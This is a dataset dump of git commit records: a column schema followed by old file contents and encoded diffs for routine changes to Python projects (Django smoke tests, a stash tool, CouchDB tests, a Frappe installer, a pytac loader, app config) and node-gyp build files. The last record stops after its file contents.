Columns (each record below lists these fields in this order):

  column        type          range
  ------------  ------------  ------------------
  commit        string        length 40 to 40
  subject       string        length 1 to 3.25k
  old_file      string        length 4 to 311
  new_file      string        length 4 to 311
  old_contents  string        length 0 to 26.3k
  lang          string class  3 values
  proba         float64       0 to 1
  diff          string        length 0 to 7.82k
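The diff column is stored percent-encoded (newlines as %0A, quotes as %22, tabs as %09, brackets as %5B/%5D), so it must be decoded before it is readable. Below is a minimal sketch of iterating over records and decoding that field with the standard-library urllib.parse.unquote; the file name "rows.jsonl" and the JSON Lines layout are assumptions for illustration only, since this dump does not name its storage format.

import json
from urllib.parse import unquote

# Iterate over dataset records. "rows.jsonl" (one JSON object per line,
# keyed by the column names above) is an assumed layout for this sketch;
# the dump itself does not say how the rows are serialized.
with open('rows.jsonl') as fh:
    for line in fh:
        record = json.loads(line)
        # The diff field percent-encodes newlines (%0A), quotes (%22),
        # tabs (%09), and brackets (%5B, %5D); unquote reverses that.
        readable_diff = unquote(record['diff'])
        print(record['commit'], record['subject'])
        print(readable_diff)

The diffs shown with each record below have already been decoded this way, with one patch line per row: lines beginning with "+" are insertions, "-" deletions, and a leading space marks context.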
commit: 077119989abb6b176c6b77ae8f4e1003769152b2
subject: Fix #2 - wrong exception handling
old_file: django_smoke_tests/management/commands/smoke_tests.py
new_file: django_smoke_tests/management/commands/smoke_tests.py
old_contents:

import argparse
import os

from django.core.management import BaseCommand, CommandParser
from django.core.management.base import CommandError

from ...generator import SmokeTestsGenerator


class Command(BaseCommand):
    help = "Smoke tests for Django endpoints."

    def create_parser(self, prog_name, subcommand):
        """
        Override in order to skip default parameters like verbosity, version, etc.
        """
        parser = CommandParser(
            self, prog="%s %s" % (os.path.basename(prog_name), subcommand),
            description=self.help or None,
        )
        # create hidden options (required by BaseCommand)
        parser.add_argument('--no-color', help=argparse.SUPPRESS)
        parser.add_argument('--settings', help=argparse.SUPPRESS)
        parser.add_argument('--pythonpath', help=argparse.SUPPRESS)

        self.add_arguments(parser)
        return parser

    def add_arguments(self, parser):
        methods_group = parser.add_mutually_exclusive_group()
        methods_group.add_argument(
            '--http-methods',
            default=None,
            type=str,
            help='comma separated HTTP methods that will be executed for all endpoints, '
                 'eg. GET,POST,DELETE [default: GET,POST,PUT,DELETE]'
        )
        methods_group.add_argument(
            '-g', '--get-only',
            action='store_true',
            default=False,
            dest='get_only',
            help='shortcut for --http-methods GET'
        )
        parser.add_argument(
            '--allow-status-codes',
            default=None,
            type=str,
            help='comma separated HTTP status codes that will be considered as success responses, '
                 'eg. 200,201,204 [default: 200,201,301,302,304,405]'
        )
        parser.add_argument(
            '--disallow-status-codes',
            default=None,
            type=str,
            help='comma separated HTTP status codes that will be considered as fail responses, '
                 'eg. 404,500'
        )
        parser.add_argument(
            '--no-db',
            dest='no_db',
            action='store_true',
            help='flag for skipping database creation'
        )
        parser.set_defaults(no_db=False)
        parser.add_argument(
            'app_names',
            default=None,
            nargs='?',
            help='names of apps to test',
        )

    def handle(self, *args, **options):
        if options.get('get_only'):
            methods_to_test = ['GET']
        else:
            methods_to_test = self._get_list_from_string(options.get('http_methods'))
        allowed_status_codes = self._get_list_from_string(options.get('allow_status_codes'))
        disallowed_status_codes = self._get_list_from_string(options.get('disallow_status_codes'))
        use_db = not options.get('no_db')
        app_names = self._get_list_from_string(options.get('app_names'))

        if allowed_status_codes and disallowed_status_codes:
            raise CommandError(
                'You can either specify --allow-status-codes or --disallow-status-codes. '
                'You must not specify both.'
            )

        generator = SmokeTestsGenerator(
            http_methods=methods_to_test,
            allowed_status_codes=allowed_status_codes,
            disallowed_status_codes=disallowed_status_codes,
            use_db=use_db,
            app_names=app_names,
        )
        generator.execute()

        if generator.warnings:
            self.stdout.write(
                'Some tests were skipped. Please report on '
                'https://github.com/kamilkijak/django-smoke-tests/issues.'
            )
            self.stdout.write('\n'.join(generator.warnings))

    @staticmethod
    def _get_list_from_string(options):
        """
        Transforms comma separated string into a list of those elements.
        Transforms strings to ints if they are numbers.
        Eg.: "200,'400','xxx'" => [200, 400, 'xxx']
        """
        if options:
            return [
                int(option) if option.isdigit() else option.strip('/')
                for option in options.split(',')
            ]
        return None

lang: Python
proba: 0.000001
diff:
@@ -829,32 +829,99 @@
 parse.SUPPRESS)
+        parser.add_argument('--traceback', help=argparse.SUPPRESS)
 self.add

commit: 443e1fab3c79ccf6a40bf01393fe4dad399926d2
subject: add tags to local item
old_file: pystash/common.py
new_file: pystash/common.py
old_contents:

# -*- coding: utf-8 -*-
import os
import sys
import shelve
import abc
import time

from clint.textui import colored


def output(message, color='white', text_only=False):
    if text_only:
        return str(getattr(colored, color)(message))
    else:
        sys.stdout.write(str(getattr(colored, color)(message)))


class StashedItem():
    """
    Incapsulate all operations with single item from Stash
    """

    def __init__(self, elem, index=None, numbered=False):
        self.elem = elem
        self.value = elem['value']
        if 'tags' in elem:
            self.tags = elem['tags']
        else:
            self.tags = []
        self.is_list = isinstance(elem['value'], list)
        if (index is not None and not self.is_list) or len(elem['value']) <= index:
            raise IndexError
        self.numbered = numbered
        self.index = index

    def get_value(self):
        return self.elem['value'] if not self.index else \
            self.elem['value'][self.index] if not 'marked' in self.elem['meta'] else self.elem['value'][self.index][0]

    def get_tags(self):
        if 'tags' in self.elem:
            return self.elem['tags']
        else:
            return []

    def __repr__(self):
        if self.is_list:
            if 'marked' in self.elem['meta']:
                # it will be uncommented after implementing marked lists
                #result = self.__assemble_marked_list()
                result = self.__assemble_unmarked_list()
            else:
                result = self.__assemble_unmarked_list()
        else:
            result = self.elem['value']
        return '%s\n' % result

    def __assemble_marked_list(self):
        result = []
        template = '{mark} {data}'
        for item in self.elem['value']:
            mark = '+' if item[1] else '-'
            result.append(template.format(mark=mark, data=item[0]))
        return self.list_to_string(result, self.numbered)

    def __assemble_unmarked_list(self):
        result = []
        for item in self.elem['value']:
            result.append(item)
        return self.list_to_string(result, self.numbered)

    @staticmethod
    def list_to_string(items, is_numbered):
        if is_numbered:
            return '\n'.join(['{}. {}'.format(n+1, item) for n, item in enumerate(items)])
        else:
            return '\n'.join(items)


class AbstractStorage(object):
    # todo: update methods signature
    """
    Here will be a docstring
    """
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def get_connection(self, db):
        pass

    @abc.abstractmethod
    def add(self, key, value, tags):
        """Returns created item as StashedItem"""

    @abc.abstractmethod
    def update(self, item_name, value, index=None):
        """Returns updated item as StashedItem"""

    @abc.abstractmethod
    def delete(self, item_name, index=None):
        """Returns Boolean"""

    @abc.abstractmethod
    def get(self, item_name, index=None):
        """Returns item as StashedItem"""

    @abc.abstractmethod
    def get_all(self):
        pass

    @abc.abstractmethod
    def is_list(self, item_name):
        pass

    @abc.abstractmethod
    def exist(self, item_name):
        pass

    @abc.abstractmethod
    def get_database_data(self):
        """
        Return whole db data as python dict for sync
        """
        pass


class NotListException(Exception):
    pass


class ShelveStorage(AbstractStorage):
    """
    Storage implementation for work with python shelve library
    """
    DBFILE = os.path.join(os.path.expanduser('~'), '.stash', 'stash.db')

    def __init__(self, db_file=None):
        self.DBFILE = db_file if db_file is not None else self.DBFILE
        path_to_dir = os.path.join('/', *self.DBFILE.split('/')[1:-1])
        if not os.path.exists(path_to_dir):
            os.makedirs(path_to_dir, 0755)
        self.connection = self.get_connection(self.DBFILE)
        if not 'storage' in self.connection:
            self.connection['storage'] = {}
        if not 'last_sync' in self.connection:
            self.connection['last_sync'] = 0
        if not 'last_update' in self.connection:
            self.connection['last_update'] = 0
        self.db = self.connection['storage']
        self.last_sync = self.connection['last_sync']
        self.last_update = self.connection['last_update']

    def get_connection(self, db):
        return shelve.open(db, writeback=True)

    def update(self, item_name, value, tags, index=None, overwrite=False):
        if index is not None:
            index -= 1
            item = self.db[item_name]['value']
            if not isinstance(item, list):
                raise NotListException
            elif index > len(item):
                raise IndexError
            if index == len(item):
                self.db[item_name]['value'].append(value)
            else:
                self.db[item_name]['value'][index] = value
        else:
            if isinstance(self.db[item_name]['value'], list) and not overwrite:
                self.db[item_name]['value'].append(value)
                self.db[item_name]['tags'].append(tags)
            else:
                self.db[item_name]['value'] = value
                self.db[item_name]['tags'] = tags
        self.db[item_name]['updated'] = int(time.time())
        #self.db[item_name]['tags'] = tags
        self.last_update = int(time.time())
        return StashedItem(self.db[item_name], index)

    def delete(self, item_name, index=None):
        if index is not None:
            index -= 1
            if not isinstance(self.db[item_name]['value'], list):
                raise NotListException
            self.db[item_name]['value'].pop(index)
            self.db[item_name]['value']['updated'] = int(time.time())
        else:
            del self.db[item_name]
        self.last_update = int(time.time())
        return True

    def add(self, key, value, tags):
        self.db[key] = {'value': value, 'updated': int(time.time())}
        self.last_update = int(time.time())
        return StashedItem(self.db[key])

    def add_dict(self, newdict):
        self.db.clear()
        for key in newdict:
            self.db[key] = newdict[key]
        self.last_update = int(time.time())
        return

    def exist(self, item_name, index=None):
        if item_name in self.db:
            if index is not None:
                try:
                    self.db[item_name]['value'][index]
                except IndexError:
                    return False
            return True
        return False

    def is_list(self, item_name):
        return isinstance(self.db[item_name]['value'], list)

    def get(self, item_name, index=None):
        index = index - 1 if index is not None else None
        item = self.db[item_name]
        return StashedItem(item, index)

    def get_all(self):
        result = {}
        for k, v in self.db.iteritems():
            result[k] = StashedItem(v)
        return result

    def tags(self, tag):
        result = {}
        for k, v in self.db.iteritems():
            if 'tags' in v:
                if tag in v['tags']:
                    result[k] = StashedItem(v)
        return result

    def alltags(self):
        result = []
        for k, v in self.db.iteritems():
            if 'tags' in v:
                for tag in v['tags']:
                    result.append(tag)
        return result

    def get_database_data(self):
        return dict(self.connection)

    def set_database_data(self, data):
        #TODO check this out
        self.connection['storage'] = data
        return True

lang: Python
proba: 0
diff:
@@ -6024,16 +6024,32 @@
 .time())
+, 'tags' : tags
 }

commit: b47143d38027a7bafc73376de01bd2fa2196ac60
subject: Add test for file interface in put_attachment
old_file: couchdb/tests/client.py
new_file: couchdb/tests/client.py
old_contents:

# -*- coding: utf-8 -*-
#
# Copyright (C) 2007 Christopher Lenz
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.

import doctest
import os
import unittest

from couchdb import client


class DatabaseTestCase(unittest.TestCase):

    def setUp(self):
        uri = os.environ.get('COUCHDB_URI', 'http://localhost:5984/')
        self.server = client.Server(uri)
        if 'python-tests' in self.server:
            del self.server['python-tests']
        self.db = self.server.create('python-tests')

    def tearDown(self):
        if 'python-tests' in self.server:
            del self.server['python-tests']

    def test_doc_id_quoting(self):
        self.db['foo/bar'] = {'foo': 'bar'}
        self.assertEqual('bar', self.db['foo/bar']['foo'])
        del self.db['foo/bar']
        self.assertEqual(None, self.db.get('foo/bar'))

    def test_unicode(self):
        self.db[u'føø'] = {u'bår': u'Iñtërnâtiônàlizætiøn', 'baz': 'ASCII'}
        self.assertEqual(u'Iñtërnâtiônàlizætiøn', self.db[u'føø'][u'bår'])
        self.assertEqual(u'ASCII', self.db[u'føø'][u'baz'])

    def test_doc_revs(self):
        doc = {'bar': 42}
        self.db['foo'] = doc
        old_rev = doc['_rev']
        doc['bar'] = 43
        self.db['foo'] = doc
        new_rev = doc['_rev']

        new_doc = self.db.get('foo')
        self.assertEqual(new_rev, new_doc['_rev'])
        new_doc = self.db.get('foo', rev=new_rev)
        self.assertEqual(new_rev, new_doc['_rev'])
        old_doc = self.db.get('foo', rev=old_rev)
        self.assertEqual(old_rev, old_doc['_rev'])

    def test_attachment_crud(self):
        doc = {'bar': 42}
        self.db['foo'] = doc
        old_rev = doc['_rev']

        self.db.put_attachment(doc, 'foo.txt', 'Foo bar', 'text/plain')
        self.assertNotEquals(old_rev, doc['_rev'])

        doc = self.db['foo']
        attachment = doc['_attachments']['foo.txt']
        self.assertEqual(len('Foo bar'), attachment['length'])
        self.assertEqual('text/plain', attachment['content_type'])

        self.assertEqual('Foo bar', self.db.get_attachment(doc, 'foo.txt'))
        self.assertEqual('Foo bar', self.db.get_attachment('foo', 'foo.txt'))

        old_rev = doc['_rev']
        self.db.delete_attachment(doc, 'foo.txt')
        self.assertNotEquals(old_rev, doc['_rev'])
        self.assertEqual(None, self.db['foo'].get('_attachments'))


def suite():
    suite = unittest.TestSuite()
    suite.addTest(unittest.makeSuite(DatabaseTestCase, 'test'))
    suite.addTest(doctest.DocTestSuite(client))
    return suite


if __name__ == '__main__':
    unittest.main(defaultTest='suite')

lang: Python
proba: 0.000001
diff:
@@ -248,16 +248,32 @@
 unittest
+
+import StringIO
 

from c
@@ -2495,16 +2495,903 @@
 ents'))
+
+
+    def test_attachment_crud_with_files(self):
+        doc = {'bar': 42}
+        self.db['foo'] = doc
+        old_rev = doc['_rev']
+        f = StringIO.StringIO('Foo bar baz')
+
+        self.db.put_attachment(doc, 'foo.txt', f, 'text/plain')
+        self.assertNotEquals(old_rev, doc['_rev'])
+
+        doc = self.db['foo']
+        attachment = doc['_attachments']['foo.txt']
+        self.assertEqual(len('Foo bar baz'), attachment['length'])
+        self.assertEqual('text/plain', attachment['content_type'])
+
+        self.assertEqual('Foo bar baz', self.db.get_attachment(doc, 'foo.txt'))
+        self.assertEqual('Foo bar baz', self.db.get_attachment('foo', 'foo.txt'))
+
+        old_rev = doc['_rev']
+        self.db.delete_attachment(doc, 'foo.txt')
+        self.assertNotEquals(old_rev, doc['_rev'])
+        self.assertEqual(None, self.db['foo'].get('_attachments'))
 

def su

commit: 2dcfccd75c49a4f375d49a52bff5d33cd971e8b6
subject: Update install.py
old_file: frappe/utils/install.py
new_file: frappe/utils/install.py
old_contents:

# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt

from __future__ import unicode_literals

import frappe
import getpass

def before_install():
	frappe.reload_doc("core", "doctype", "docfield")
	frappe.reload_doc("core", "doctype", "docperm")
	frappe.reload_doc("core", "doctype", "doctype")

def after_install():
	# reset installed apps for re-install
	frappe.db.set_global("installed_apps", '["frappe"]')

	# core users / roles
	install_docs = [
		{'doctype':'User', 'name':'Administrator', 'first_name':'Administrator', 'email':'[email protected]', 'enabled':1},
		{'doctype':'User', 'name':'Guest', 'first_name':'Guest', 'email':'[email protected]', 'enabled':1},
		{'doctype':'UserRole', 'parent': 'Administrator', 'role': 'Administrator', 'parenttype':'User', 'parentfield':'user_roles'},
		{'doctype':'UserRole', 'parent': 'Guest', 'role': 'Guest', 'parenttype':'User', 'parentfield':'user_roles'},
		{'doctype': "Role", "role_name": "Report Manager"},
		{'doctype': "Workflow State", "workflow_state_name": "Pending", "icon": "question-sign", "style": ""},
		{'doctype': "Workflow State", "workflow_state_name": "Approved", "icon": "ok-sign", "style": "Success"},
		{'doctype': "Workflow State", "workflow_state_name": "Rejected", "icon": "remove", "style": "Danger"},
		{'doctype': "Workflow Action", "workflow_action_name": "Approve"},
		{'doctype': "Workflow Action", "workflow_action_name": "Reject"},
		{'doctype': "Workflow Action", "workflow_action_name": "Review"},
		{'doctype': "Email Account", "email_id": "[email protected]", "default_outgoing": 1},
		{'doctype': "Email Account", "email_id": "[email protected]", "default_incoming": 1}
	]

	from frappe.core.doctype.file.file import make_home_folder
	make_home_folder()

	for d in install_docs:
		try:
			frappe.get_doc(d).insert()
		except frappe.NameError:
			pass

	import_country_and_currency()

	# save default print setting
	print_settings = frappe.get_doc("Print Settings")
	print_settings.save()

	# all roles to admin
	frappe.get_doc("User", "Administrator").add_roles(*frappe.db.sql_list("""select name from tabRole"""))

	# update admin password
	from frappe.auth import _update_password
	_update_password("Administrator", get_admin_password())

	# setup wizard now in frappe
	frappe.db.set_default('desktop:home_page', 'setup-wizard');

	frappe.db.commit()

def get_admin_password():
	def ask_admin_password():
		admin_password = getpass.getpass("Set Administrator password: ")
		admin_password2 = getpass.getpass("Re-enter Administrator password: ")
		if not admin_password == admin_password2:
			print "\nPasswords do not match"
			return ask_admin_password()
		return admin_password

	admin_password = frappe.conf.get("admin_password")
	if not admin_password:
		return ask_admin_password()
	return admin_password

def before_tests():
	frappe.db.sql("delete from `tabCustom Field`")
	frappe.db.sql("delete from `tabEvent`")
	frappe.db.commit()
	frappe.clear_cache()

def import_country_and_currency():
	from frappe.geo.country_info import get_all
	from frappe.utils import update_progress_bar
	data = get_all()

	for i, name in enumerate(data):
		update_progress_bar("Updating country info", i, len(data))
		country = frappe._dict(data[name])
		add_country_and_currency(name, country)

	print

	# enable frequently used currencies
	for currency in ("INR", "USD", "GBP", "EUR", "AED", "AUD", "JPY", "CNY", "CHF"):
		frappe.db.set_value("Currency", currency, "enabled", 1)

def add_country_and_currency(name, country):
	if not frappe.db.exists("Country", name):
		frappe.get_doc({
			"doctype": "Country",
			"country_name": name,
			"code": country.code,
			"date_format": country.date_format or "dd-mm-yyyy",
			"time_zones": "\n".join(country.timezones or []),
			"docstatus": 0
		}).db_insert()

	if country.currency and not frappe.db.exists("Currency", country.currency):
		frappe.get_doc({
			"doctype": "Currency",
			"currency_name": country.currency,
			"fraction": country.currency_fraction,
			"symbol": country.currency_symbol,
			"fraction_units": country.currency_fraction_units,
			"smallest_currency_fraction_value": country.smallest_currency_fraction_value,
			"number_format": country.number_format,
			"docstatus": 0
		}).db_insert()

lang: Python
proba: 0.000001
diff:
@@ -1557,37 +1557,255 @@
 'doctype': "
-Email Account
+Domain", "domain_name":"example.com", "email_id": "[email protected]", "password": "pass", "email_server": "imap.example.com","use_imap": 1, "smtp_server": "smtp.example.com"},
+		{'doctype': "Email Account", "domain":"example.com
 ", "email_id
@@ -1890,16 +1890,40 @@
 ccount",
+ "domain":"example.com",
 "email_

commit: 43f67a09d0e194ef3012bad97e0cb45db7c34d35
subject: test travis
old_file: binding.gyp
new_file: binding.gyp
old_contents:

{
    "targets": [
        {
            "target_name": "addon",
            "sources": [ "src/addon.cc", "src/object.cc", "src/async.cc", "src/engine.cc", "src/results.cc" ],
            #"cflags": [ "-Werror", "-Wall", "-Wextra", "-Wpedantic", "-Wunused-parameter", "-funroll-loops", "-Ofast" ],#targets all files, c and c++
            #"cflags_c": [ "-hello" ],# does this do anything?
            #"cflags_cc": [ "-Werror", "-Wall", "-Wextra", "-Wpedantic", "-Wunused-parameter", "-funroll-loops", "-Ofast" ],#target c++ only
            "cflags": [ "-O2", ],
            "cflags!": [ "-fno-exceptions", "-Wno-unused-parameter", "-O3", "-std=gnu++1y"],
            "cflags_cc!": [ "-fno-exceptions", "-Wno-unused-parameter" ],
            "include_dirs": ["<!@(node -p \"require('node-addon-api').include\")"],
            "dependencies": ["<!(node -p \"require('node-addon-api').gyp\")"],
            "defines": [ "NAPI_CPP_EXCEPTIONS", "NODE_ADDON_API_DISABLE_DEPRECATED" ],
            "conditions": [
                ["OS==\"win\"", {
                    "msvs_settings": {
                        "VCCLCompilerTool": { "ExceptionHandling": 1 }
                    }
                }],
                ["OS==\"mac\"", {
                    "xcode_settings": {
                        "CLANG_CXX_LANGUAGE_STANDARD": 'c++14',
                        "CLANG_CXX_LIBRARY": "libc++",
                        "GCC_ENABLE_CPP_EXCEPTIONS": "YES",
                        "MACOSX_DEPLOYMENT_TARGET": "10.7",
                        "GCC_ENABLE_CPP_RTTI" : "YES",
                        # options to test: "fast", "3", "2", "1", "0", "", "s"
                        #"GCC_OPTIMIZATION_LEVEL": "1",
                        # only passed to C files
                        "OTHER_CFLAGS" : [],
                        # only passed to C++ files
                        "OTHER_CPLUSPLUSFLAGS": [
                            "-Werror",
                            "-Wextra",
                            "-Wpedantic",
                            "-Wunused-parameter",
                            #"-Weverything"
                            #"-fdiagnostics-show-hotness",
                            #"-fsave-optimization-record"
                        ],
                    }
                }]
            ]
        }
    ]
}

lang: Python
proba: 0.000002
diff:
@@ -545,16 +545,30 @@
 "-O2",
+"-std=gnu++14"
 ],
@@ -633,24 +633,8 @@
 -O3"
-, "-std=gnu++1y"
 ],

commit: 4d0d8862b6741e6a34eb28eeb8d4f6e8861903e8
subject: Print sensible message if trying to load lattice without cothread.
old_file: pytac/load_csv.py
new_file: pytac/load_csv.py
old_contents:

"""Module to load the elements of the machine from multiple csv files stored
in the same directory."""
import os
import csv
from pytac import lattice, element, device, units, utils
import collections


def get_div_rigidity(energy):
    rigidity = utils.rigidity(energy)

    def div_rigidity(input):
        return input / rigidity

    return div_rigidity


def get_mult_rigidity(energy):
    rigidity = utils.rigidity(energy)

    def mult_rigidity(input):
        return input * rigidity

    return mult_rigidity


def load_unitconv(directory, mode, lattice):
    """Load the unit conversion objects from a file.

    Args:
        directory(string): The directory where the data is stored.
        mode(string): The name of the mode that is used.
        lattice(Lattice): The lattice object that will be used.
    """
    data = collections.defaultdict(list)
    uc = {}
    with open(os.path.join(directory, mode, 'uc_poly_data.csv')) as poly:
        csv_reader = csv.DictReader(poly)
        for item in csv_reader:
            data[(int(item['uc_id']))].append((int(item['coeff']), float(item['val'])))
    for d in data:
        u = units.PolyUnitConv([x[1] for x in reversed(sorted(data[d]))])
        uc[d] = u

    data.clear()
    with open(os.path.join(directory, mode, 'uc_pchip_data.csv')) as pchip:
        csv_reader = csv.DictReader(pchip)
        for item in csv_reader:
            data[(int(item['uc_id']))].append((float(item['eng']), float(item['phy'])))
    for d in data:
        eng = [x[0] for x in sorted(data[d])]
        phy = [x[1] for x in sorted(data[d])]
        u = units.PchipUnitConv(eng, phy)
        uc[d] = u

    with open(os.path.join(directory, mode, 'unitconv.csv')) as unitconv:
        csv_reader = csv.DictReader(unitconv)
        for item in csv_reader:
            element = lattice[int(item['el_id']) - 1]
            if 'QUAD' in element.families or 'SEXT' in element.families:
                uc[int(item['uc_id'])].f1 = get_div_rigidity(lattice.get_energy())
                uc[int(item['uc_id'])].f2 = get_mult_rigidity(lattice.get_energy())
            element._uc[item['field']] = uc[int(item['uc_id'])]


def load(mode, control_system=None, directory=None):
    """Load the elements of a lattice from a directory.

    Args:
        mode(string): The name of the mode to be loaded.
        control_system(ControlSystem): The control system to be used. If none
            is provided an EpicsControlSystem will be created.
        directory(string): Directory where to load the files from. If no
            directory is given the data directory at the root of the
            repository is used.

    Returns:
        Lattice: The lattice containing all elements.
    """
    if control_system is None:
        # Don't import epics unless we need it to avoid unnecessary
        # installation of cothread
        from pytac import epics
        control_system = epics.EpicsControlSystem()
    if directory is None:
        directory = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'data')
    lat = lattice.Lattice(mode, control_system, 3000)
    with open(os.path.join(directory, mode, 'elements.csv')) as elements:
        csv_reader = csv.DictReader(elements)
        for item in csv_reader:
            cell = int(item['cell']) if item['cell'] else None
            e = element.Element(item['name'], float(item['length']), item['type'], cell)
            e.add_to_family(item['type'])
            lat.add_element(e)
    with open(os.path.join(directory, mode, 'devices.csv')) as devices:
        csv_reader = csv.DictReader(devices)
        for item in csv_reader:
            name = item['name']
            enable_pv = item['enable_pv']
            enable_value = item['enable_value']
            get_pv = item['get_pv']
            set_pv = item['set_pv']
            pve = True
            if enable_pv and enable_value:
                pve = device.PvEnabler(enable_pv, enable_value, control_system)
            d = device.Device(name, control_system, pve, get_pv, set_pv)
            lat[int(item['id']) - 1].add_device(item['field'], d, control_system)
    with open(os.path.join(directory, mode, 'families.csv')) as families:
        csv_reader = csv.DictReader(families)
        for item in csv_reader:
            lat[int(item['id']) - 1].add_to_family(item['family'])
    if os.path.exists(os.path.join(directory, mode, 'unitconv.csv')):
        load_unitconv(directory, mode, lat)

    return lat

lang: Python
proba: 0
diff:
@@ -96,16 +96,65 @@
 ory."""
+from __future__ import print_function
+import sys
 import o
@@ -2756,24 +2756,37 @@
 ts.
     """
+    try:
     if contr
@@ -2812,16 +2812,20 @@
+    
 # Don't
@@ -2884,16 +2884,20 @@
+    
 # instal
@@ -2923,16 +2923,20 @@
+    
 from pyt
@@ -2951,16 +2951,20 @@
 t epics
+    
@@ -3007,16 +3007,206 @@
 ystem()
+    except ImportError:
+        print(('To load a lattice using the default control system,'
+               ' please install cothread.'),
+              file=sys.stderr)
+        return None
 if d
@@ -3299,16 +3299,49 @@
 ile__)),
+
 'data')

commit: ff9822c7776cdef1e14e80a2cc56700bbc4f24f2
subject: Fix Mac OS build warnings on old node versions
old_file: binding.gyp
new_file: binding.gyp
old_contents:

{
    "targets": [
        {
            "target_name": "anitomy-js",
            "sources": [
                "lib/anitomy/anitomy/anitomy.cpp",
                "lib/anitomy/anitomy/anitomy.h",
                "lib/anitomy/anitomy/element.cpp",
                "lib/anitomy/anitomy/element.h",
                "lib/anitomy/anitomy/keyword.cpp",
                "lib/anitomy/anitomy/keyword.h",
                "lib/anitomy/anitomy/options.h",
                "lib/anitomy/anitomy/parser.cpp",
                "lib/anitomy/anitomy/parser.h",
                "lib/anitomy/anitomy/parser_helper.cpp",
                "lib/anitomy/anitomy/parser_number.cpp",
                "lib/anitomy/anitomy/string.cpp",
                "lib/anitomy/anitomy/string.h",
                "lib/anitomy/anitomy/token.cpp",
                "lib/anitomy/anitomy/token.h",
                "lib/anitomy/anitomy/tokenizer.cpp",
                "lib/anitomy/anitomy/tokenizer.h",
                "src/anitomy_js.h",
                "src/anitomy_js.cpp",
                "src/worker.h",
                "src/worker.cpp",
                "src/addon.cpp"
            ],
            "xcode_settings": {
                "OTHER_CFLAGS": [
                    "-mmacosx-version-min=10.7",
                    "-stdlib=libc++",
                    "-std=c++14"
                ]
            },
            "cflags": [
                "-std=c++14"
            ],
            "cflags_cc!": [
                "-fno-rtti",
                "-fno-exceptions",
                "-std=gnu++0x"
            ],
            "include_dirs": [
                "<!(node -e \"require('nan')\")",
                "lib/anitomy"
            ]
        }
    ]
}

lang: Python
proba: 0
diff:
@@ -1187,109 +1187,310 @@
 "
-OTHER_CFLAGS": [
-"-mmacosx-version-min=10.7",
-"-stdlib=libc++
+CLANG_CXX_LANGUAGE_STANDARD": "c++14",
+"CLANG_CXX_LIBRARY": "libc++",
+"MACOSX_DEPLOYMENT_TARGET": "10.9",
+"GCC_ENABLE_CPP_EXCEPTIONS": "NO",
+"GCC_ENABLE_CPP_RTTI": "NO",
+"OTHER_CPLUSPLUSFLAGS": [
+"-Wall
 ",
@@ -1506,33 +1506,26 @@
 "-
-std=c++14
+O3
 "
@@ -1566,16 +1566,19 @@
 "cflags
+_cc
 ": [
@@ -1602,16 +1602,17 @@
 d=c++14"
+,
@@ -1617,41 +1617,23 @@
-],
-"cflags_cc!": [
+"-Wall",
@@ -1651,18 +1651,11 @@
 "-
-fno-rtti",
+O3"
@@ -1667,30 +1667,38 @@
-"-fno-exceptions",
+],
+"cflags_cc!": [

commit: 19d6e96a7039f6959cc9f47ba75c2972136893a5
subject: Update config for email handling
old_file: app/config.py
new_file: app/config.py
old_contents:

#!/usr/bin/python
import json
import sys
import argparse
import os

from celery.schedules import crontab


def parse_args():  # pragma: no cover
    parser = argparse.ArgumentParser()
    parser.add_argument("-e", "--env", default="development", help="environment")
    return parser.parse_args()


def output(stmt):  # pragma: no cover
    print(stmt)


def main(argv):
    args = parse_args()
    try:
        output(configs[args.env].PORT)
    except:
        output('No environment')


class Config(object):
    DEBUG = False
    ENVIRONMENT = os.environ.get('ENVIRONMENT', 'development')
    SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL')
    ADMIN_CLIENT_ID = os.environ.get('ADMIN_CLIENT_ID')
    ADMIN_CLIENT_SECRET = os.environ.get('ADMIN_CLIENT_SECRET')
    TOKEN_EXPIRY = os.environ.get('TOKEN_EXPIRY', 60 * 24)  # expires every 24 hours
    APP_SERVER = os.environ.get('APP_SERVER')
    JWT_SECRET_KEY = os.environ.get('JWT_SECRET')
    JWT_BLACKLIST_ENABLED = True
    JWT_BLACKLIST_TOKEN_CHECKS = ['access', 'refresh']
    ADMIN_USERS = os.environ.get('ADMIN_USERS')
    EMAIL_DOMAIN = os.environ.get('EMAIL_DOMAIN')
    EVENTS_MAX = 30
    PROJECT = os.environ.get('PROJECT')
    STORAGE = os.environ.get('GOOGLE_STORE')
    PAYPAL_URL = os.environ.get('PAYPAL_URL')
    PAYPAL_USER = os.environ.get('PAYPAL_USER')
    PAYPAL_PASSWORD = os.environ.get('PAYPAL_PASSWORD')
    PAYPAL_RECEIVER = os.environ.get('PAYPAL_RECEIVER')
    PAYPAL_SIG = os.environ.get('PAYPAL_SIG')
    PAYPAL_VERIFY_URL = os.environ.get('PAYPAL_VERIFY_URL')
    EMAIL_PROVIDER_URL = os.environ.get('EMAIL_PROVIDER_URL')
    EMAIL_PROVIDER_APIKEY = os.environ.get('EMAIL_PROVIDER_APIKEY')
    EMAIL_TOKENS = json.loads(os.environ.get('EMAIL_TOKENS')) if 'EMAIL_TOKENS' \
        in os.environ and os.environ.get('EMAIL_TOKENS')[:1] == '{' else {}
    EMAIL_SALT = os.environ.get('EMAIL_SALT')
    EMAIL_UNSUB_SALT = os.environ.get('EMAIL_UNSUB_SALT')
    TEST_EMAIL = os.environ.get('TEST_EMAIL')
    FRONTEND_ADMIN_URL = os.environ.get('FRONTEND_ADMIN_URL')
    API_BASE_URL = os.environ.get('API_BASE_URL')
    IMAGES_URL = os.environ.get('IMAGES_URL')
    FRONTEND_URL = os.environ.get('FRONTEND_URL')
    GOOGLE_APPLICATION_CREDENTIALS = os.environ.get('GOOGLE_APPLICATION_CREDENTIALS')
    TRAVIS_COMMIT = os.environ.get('TRAVIS_COMMIT')
    CELERY_BROKER_URL = os.environ.get('CELERY_BROKER_URL')
    CELERY_TIMEZONE = 'Europe/London'
    CELERY_ENABLE_UTC = True
    CELERY_ACCEPT_CONTENT = ['json']
    CELERY_TASK_SERIALIZER = 'json'
    CELERYBEAT_SCHEDULE = {
        'send-periodic-emails': {
            'task': 'send_periodic_emails',
            'schedule': crontab(minute=0, hour='*'),
        },
    }
    EMAIL_DELAY = 1  # hours
    EMAIL_LIMIT = 400


class Development(Config):
    DEBUG = True
    ENVIRONMENT = 'development'
